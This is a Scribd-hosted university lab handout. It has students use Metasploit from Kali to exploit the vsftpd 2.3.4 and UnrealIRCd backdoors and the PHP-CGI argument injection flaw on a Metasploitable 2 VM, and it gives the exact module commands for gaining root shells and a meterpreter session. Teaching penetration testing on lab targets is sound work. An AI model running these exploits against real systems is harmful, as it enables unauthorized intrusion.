Scribd
Upload
49 views

Lab 8 Metasploit v. Linux

This document provides instructions for exploiting three vulnerabilities in the Metasploitable 2 virtual machine using Metasploit: 1) exploiting a backdoor in VSFTPD v2.3.4 to obtain a root shell, 2) exploiting a backdoor in UnrealIRCd 3.2.8.1 to obtain a root shell, and 3) exploiting CVE-2012-1823 PHP CGI argument injection to obtain a meterpreter session as the www-data user. Students are instructed to capture screenshots after obtaining each shell or session and submit the images for credit.

Uploaded by

Tien xinh trai
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
49 views

Lab 8 Metasploit v. Linux

This document provides instructions for exploiting three vulnerabilities in the Metasploitable 2 virtual machine using Metasploit: 1) exploiting a backdoor in VSFTPD v2.3.4 to obtain a root shell, 2) exploiting a backdoor in UnrealIRCd 3.2.8.1 to obtain a root shell, and 3) exploiting CVE-2012-1823 PHP CGI argument injection to obtain a meterpreter session as the www-data user. Students are instructed to capture screenshots after obtaining each shell or session and submit the images for credit.

Uploaded by

Tien xinh trai
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Project 6: Metasploit v.

Linux (15 points)


What You Need
1. A Kali Linux machine, real or virtual
2. The "Metasploitable 2" vulnerable Linux Server you prepared in a previous project

Setup
Start your Kali VM and log in as root with the password toor

Start your Metasploitable 2 VM and log in as msfadmin with the password msfadmin

Execute the ifconfig command on both machines and ping from one to the other. Make sure you get replies, as shown below.

Task 1: Exploiting vsftpd


In the previous project, Nmap found the FTP server "vsftpd 2.3.4" running on the Metasploitable 2 target.

In Kali, execute this command to open Metasploit.

msfconsole

At the "msf>" prompt, execute this command.

search vsftpd

As shown below, one exploit is found.

Execute these commands:

use exploit/unix/ftp/vsftpd_234_backdoor
show options

As shown below, the only required parameter is RHOST, the IP address of the target system.
Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.

set RHOST 172.16.1.190


exploit

As shown below, a command shell session opens. Execute the whoami command to see the reply root.

Capturing a Screen Image


Make sure the "Command shell session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6a".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT In Kali, execute these commands to exit the shell and Metasploit.

exit
exit

Task 2: Exploiting Unreal IRCd


In the previous project, Nmap found the UnrealIRCd server listening on port 6667 on the Metasploitable 2 target.

In Kali, execute this command to open Metasploit.

msfconsole

At the "msf>" prompt, execute this command.

search unreal

As shown below, one exploit is found.


Execute these commands:

use exploit/unix/irc/unreal_ircd_3281_backdoor
show options

As shown below, the only required parameter is RHOST, the IP address of the target system.

Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.

set RHOST 172.16.1.190


exploit

As shown below, a command shell session opens. Execute the whoami command to see the reply root.

Capturing a Screen Image


Make sure the "Command shell session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6b".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT Press Ctrl+C to cancel the session.

In Kali, execute these commands to exit the shell and Metasploit.


y
exit

Task 3: Exploiting PHP CGI Argument Injection


On your Kali VM, open Firefox and go to the IP address of your Metasploitable 2 VM.

A Web page opens, as shown below.

Click the phpMyAdmin link.

Append this to the end of the URL, and press Enter.

?-s

The source code of the Web page appears, as shown below.

This is a known bug in PHP-CGI, and it allows us to get remote code execution with Metasploit.

In Kali, execute this command to open Metasploit.

msfconsole

At the "msf>" prompt, execute this command.

search php_cgi

As shown below, one exploit is found.


Execute these commands:

use exploit/multi/http/php_cgi_arg_injection
show options

As shown below, the only required parameter is RHOST, the IP address of the target system.

Execute these commands, replacing the IP address with the IP address of your Metasploitable 2 VM.

set RHOST 172.16.1.190


exploit

As shown below, a meterpreter session opens.

Troubleshooting
If you are using Kali 2017.2, this exploit fails, and you get the message "Meterpreter session closed ... reason: died" message, as shown
below. This seems to be a bug in Kali. Just turn in that image and I'll accept it.
Execute these commands to see system information and your user ID. You are "www-data", which is a low-privilege account. To get root access, you need
another exploit, as discussed here.

sysinfo
getuid

Capturing a Screen Image


Make sure the "Meterpreter session opened" message is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 6c".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Turning in Your Project


Email the images to [email protected] with a subject line of "Proj 6 From YOUR NAME", replacing "YOUR NAME" with your real name.

Send a Cc to yourself.

Credits
Exploiting VSFTPD v2.3.4 on Metasploitable 2

Hacking Unreal IRCd 3.2.8.1 on Metasploitable 2

CVE-2012-1823: PHP CGI

https://community.rapid7.com/docs/DOC-1875

Last Modified: 10-12-17 9 pm

You might also like